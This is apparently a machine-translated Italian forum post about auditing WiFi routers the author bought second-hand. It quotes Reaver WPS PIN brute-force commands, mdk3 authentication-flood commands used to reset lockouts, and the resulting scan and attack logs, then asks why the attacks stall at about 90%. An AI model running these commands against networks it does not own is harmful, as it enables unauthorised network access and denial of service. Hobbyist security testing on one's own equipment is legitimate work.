Ho cercato di utilizzare le attuali tecniche di auditing wifi per quanto riguarda il recupero della password del router.
GEAR:
Ho partecipato a vendite di car boot e acquistato alcuni dei router attuali sul mercato. Ho usato un Raspberry Pi Model 3B + con Kali Linux Installato con
Scheda wireless: driver Alfa AWUSO36NH: chipset rt2800usb: tecnologia Ralink, Corp. RT2870 / RT3070
Come sappiamo già non ci sono più router WEP venduti, quindi l'unica sfruttabilità che il sistema ha come ho letto, oltre a catturare l'handshake e bruteforcing (che mi porterà settimane buone con un buon computer o pagando un server per farlo per me che non voglio), quindi volevo provare con la tecnica WPS. Non ho familiarizzato con i concetti di questo programma, ma ho cercato di essere cauto nel configurarlo e, per quanto ne so, a volte la funzione WPS viene bloccata quando si tentano troppi PIN in un breve periodo di tempo, quindi fatto uso dello script ReVdK3-r3.sh che combina la potenza di Reaver con Mdk3 per resettare automaticamente il router una volta che viene bloccato.
PROGRAMMI UTILIZZATI:
Reaver v1.6.5 Strumento Attacco configurazione protetta WiFi mdk3 Installato: 6.0-4
Essendo cauto ho impostato -d 5 e -t 5 quali sono i parametri che la sceneggiatura ti permette di modificare, a volte li imposterei anche 10 entrambi.
Quindi ho finito con questi input
(codificherò alcuni dei MAC e ESSID con i caratteri jolly in hashcat) (supponendo che -1? d? A? B? C? D? E? F (HEXADECIMAL)) (? u = ABCDEFGHIJKLMNOPQRSTUVWXYZ) (? d = 0123456789)
wash -i wlan0
00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d
Utilizzo di Reaver
reaver -i mon1 -b 00:F2:01:3C:?1?1:?1?1 -S -c 11 -d 5 -t 5 -l 10 -N -vv
Uso di mdk3 Dos Flood Attack
mdk3 mon1 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon2 a -a 00:F2:01:3C:?1?1:?1?1 -s 200 & mdk3 mon3 a -a 00:F2:01:3C:?1?1:?1?1 -s 200
Poi ricevo i seguenti output (per i diversi router)
00:F2:01:3C:?1?1:?1?1 11 -79 1.0 No BTHub3-?u?u?u?d
Dopo aver provato alcuni PIN si blocca a questo punto
[+] Trying pin "16585676"
[+] Associated with 00:F2:01:3C:?1?1:?1?1 (ESSID: BTHub3-?u?u?u?d)
[+] 15.15% complete @ 2018-06-16 05:55:31 (0 seconds/pin)
[+] Trying pin "16585676"
F8:1A:67:78:?1?1:?1?1 1 -69 1.0 No RealtekS TP-LINK_?d?d?d?u?d?d
Dopo aver provato PIN per interi giorni, si è fermato in 99985677 e non si è spinto oltre:
[+] Trying pin "99985677"
[!] Found packet with bad FCS, skipping...
[+] Associated with F8:1A:67:78:?1?1:?1?1 (ESSID: TP-LINK_?d?d?d?u?d?d)
[+] 90.90% complete @ 2018-06-16 06:51:05 (0 seconds/pin)
[!] WARNING: 25 successive start failures
20:A6:80:D2:?1?1:?1?1 6 -73 2.0 No RealtekS TALKTALK?u?d?u?d?d?u
[!] Found packet with bad FCS, skipping...
[+] Trying pin "99985677"
[+] Associated with 20:A6:80:D2:?1?1:?1?1 (ESSID: TALKTALK?u?d?u?d?d?u)
[+] 90.90% complete @ 2018-06-16 06:57:46 (0 seconds/pin)
Rimane bloccato nello stesso punto del precedente
60:38:E0:D4:?1?1:?1?1 6 -79 2.0 No RealtekS virginmedia?d?d?d?d?d?d?d
[+] Restored previous session
[+] Waiting for beacon from 60:38:E0:D4:?1?1:?1?1
[!] Found packet with bad FCS, skipping...
[+] Received beacon from 60:38:E0:D4:?1?1:?1?1
[+] Vendor: RealtekS
[+] Trying pin "88885674"
[+] Associated with 60:38:E0:D4:?1?1:?1?1 (ESSID: virginmedia?d?d?d?d?d?d?d)
Restituisce bloccato anche in questo PIN.
Penso che in quelli che hanno raggiunto il 90% del processo il router potrebbe aver fatto il ladro ingannevole come se stesse provando i PIN, ma è sospetto che debba raggiungere sempre il 90% del processo, quindi è stato sicuramente perdere tempo.
C'è qualche soluzione che ritieni? In che modo la risoluzione dei problemi è in questo caso? Ho i file di sessione nel caso li desideri.
Ho provato con molti router diversi, ma quelli non sono stati avviati, quindi non mi sono neanche preoccupato di pubblicarli (non ho nemmeno salvato la sessione) C'è qualche guida per comprendere a fondo i parametri di Reaver. A proposito, ho provato a usare Bully ma non provo nemmeno un singolo PIN.
Infine, questa vulnerabilità WPS viene risolta dalle società di router? Se è così, perché non funziona nemmeno nei router di 10 anni (come BTHub3) il firmware del router è stato aggiornato da qualche processo?
Se questo exploit è stato risolto, significa che l'unica pecca che c'è ora è catturare l'handshake e applicarlo bruteforcing?